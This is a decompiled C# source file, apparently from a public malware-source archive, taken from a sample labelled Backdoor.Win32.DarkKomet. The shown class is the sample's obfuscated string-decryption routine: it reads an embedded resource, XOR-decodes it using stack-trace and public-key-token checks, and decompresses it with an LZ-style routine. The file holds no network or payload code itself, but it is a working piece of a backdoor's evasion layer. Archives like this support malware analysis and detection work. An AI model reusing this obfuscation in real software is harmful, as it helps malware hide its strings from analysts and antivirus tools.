MalwareSourceCode/MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/_000E.cs
2022-08-18 06:28:56 -05:00

192 lines
6.7 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: 
// Assembly: 10-June, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2713F504-3EB6-448B-931C-99CD142737FF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
internal static class \u000E
{
private static readonly Dictionary<int, string> \u0002 = new Dictionary<int, string>(6);
private static BinaryReader \u0003;
private static byte[] \u0005;
private static short \u0008;
private static int \u0006;
private static byte[] \u000E;
[MethodImpl(MethodImplOptions.NoInlining)]
internal static string \u0002(int _param0)
{
lock (\u000E.\u0002)
{
string str1;
byte[] numArray1;
for (; !\u000E.\u0002.TryGetValue(_param0, out str1); _param0 = ((int) numArray1[2] | (int) numArray1[3] << 16 | (int) numArray1[0] << 8 | (int) numArray1[1] << 24) ^ -_param0)
{
if (\u000E.\u0003 == null)
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
Assembly.GetCallingAssembly();
\u000E.\u0006 = 1610370;
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream("\u200B");
int skipFrames = 1;
StackTrace stackTrace = new StackTrace(skipFrames, false);
\u000E.\u0006 ^= 6470 | skipFrames;
int index = skipFrames - 1;
StackFrame frame = stackTrace.GetFrame(index);
MethodBase methodBase = frame == null ? (MethodBase) null : frame.GetMethod();
\u000E.\u0006 ^= index + 128;
Type type = (object) methodBase == null ? (Type) null : methodBase.DeclaringType;
if (frame == null)
\u000E.\u0006 ^= 219315;
bool flag = (object) type == (object) typeof (RuntimeMethodHandle);
\u000E.\u0006 ^= 160;
if (!flag)
{
flag = (object) type == null;
if (flag)
\u000E.\u0006 ^= 219283;
}
if (flag == (stackTrace != null))
\u000E.\u0006 ^= 32;
\u000E.\u0006 ^= 6502 | index + 1;
\u000E.\u0003 = new BinaryReader(manifestResourceStream);
short count = (short) ((int) \u000E.\u0003.ReadInt16() ^ (int) (short) (~--~~-~-~-1471310255 ^ 1471284911));
if (count == (short) 0)
\u000E.\u0008 = (short) ((int) \u000E.\u0003.ReadInt16() ^ (int) (short) ~-~--~~-~17028);
else
\u000E.\u0005 = \u000E.\u0003.ReadBytes((int) count);
Assembly assembly = executingAssembly;
AssemblyName assemblyName;
try
{
assemblyName = assembly.GetName();
}
catch
{
assemblyName = new AssemblyName(assembly.FullName);
}
\u000E.\u000E = assemblyName.GetPublicKeyToken();
if (\u000E.\u000E != null && \u000E.\u000E.Length == 0)
\u000E.\u000E = (byte[]) null;
\u000E.\u0006 = \u000E.\u0006 & 268435314 ^ 6788;
}
int num1 = _param0 ^ 759805953;
\u000E.\u0003.BaseStream.Position = (long) num1;
byte[] numArray2;
if (\u000E.\u0005 != null)
{
numArray2 = \u000E.\u0005;
}
else
{
short count = \u000E.\u0008 != (short) -1 ? \u000E.\u0008 : (short) ((int) \u000E.\u0003.ReadInt16() ^ -19352 ^ num1);
numArray2 = count != (short) 0 ? \u000E.\u0003.ReadBytes((int) count) : (byte[]) null;
}
int num2 = \u000E.\u0003.ReadInt32() ^ num1 ^ -~~--~~-~-~-904937009 ^ 1890831825;
if (num2 == -2)
{
numArray1 = \u000E.\u0003.ReadBytes(4);
_param0 = 1162081278;
}
else
{
bool flag1 = (num2 & int.MinValue) != 0;
bool flag2 = (num2 & 1073741824) != 0;
int count = num2 & 1073741823;
byte[] numArray3 = \u000F.\u0002(numArray2, \u000E.\u0003.ReadBytes(count));
if (\u000E.\u000E != null != (\u000E.\u0006 != 1607814))
{
for (int index = 0; index < count; ++index)
{
byte num3 = \u000E.\u000E[index & 7];
byte num4 = (byte) ((int) num3 << 3 | (int) num3 >> 5);
numArray3[index] = (byte) ((uint) numArray3[index] ^ (uint) num4);
}
}
int num5 = \u000E.\u0006 - 12;
byte[] bytes;
int length;
if (!flag2)
{
bytes = numArray3;
length = count;
}
else
{
length = (int) numArray3[2] | (int) numArray3[0] << 16 | (int) numArray3[3] << 8 | (int) numArray3[1] << 24;
bytes = new byte[length];
\u000E.\u0002(numArray3, 4, bytes);
}
string str2;
if (flag1 && num5 == 1607802)
{
char[] chArray = new char[length];
for (int index = 0; index < length; ++index)
chArray[index] = (char) bytes[index];
str2 = new string(chArray);
}
else
str2 = Encoding.Unicode.GetString(bytes, 0, bytes.Length);
int num6 = num5 + ((int) sbyte.MaxValue + (num5 & 3) << 5);
if (num6 != 1611930)
str2 = (_param0 + count ^ 936568 ^ num6 & 1293).ToString("X");
string str3 = string.Intern(str2);
\u000E.\u0002.Add(_param0, str3);
if (\u000E.\u0002.Count == 6)
{
\u000E.\u0003.Close();
\u000E.\u0003 = (BinaryReader) null;
\u000E.\u0005 = \u000E.\u000E = (byte[]) null;
}
return str3;
}
}
return str1;
}
}
private static int \u0002(byte[] _param0, int _param1, byte[] _param2)
{
int num1 = 0;
int num2 = 0;
int num3 = 128;
int length = _param2.Length;
label_9:
while (num1 < length)
{
if ((num3 <<= 1) == 256)
{
num3 = 1;
num2 = (int) _param0[_param1++];
}
if ((num2 & num3) != 0)
{
int num4 = ((int) _param0[_param1] >> 2) + 3;
int num5 = ((int) _param0[_param1] << 8 | (int) _param0[_param1 + 1]) & 1023;
_param1 += 2;
int num6 = num1 - num5;
if (num6 < 0)
return -1;
while (true)
{
if (--num4 >= 0 && num1 < length)
_param2[num1++] = _param2[num6++];
else
goto label_9;
}
}
else
_param2[num1++] = _param0[_param1++];
}
return 0;
}
}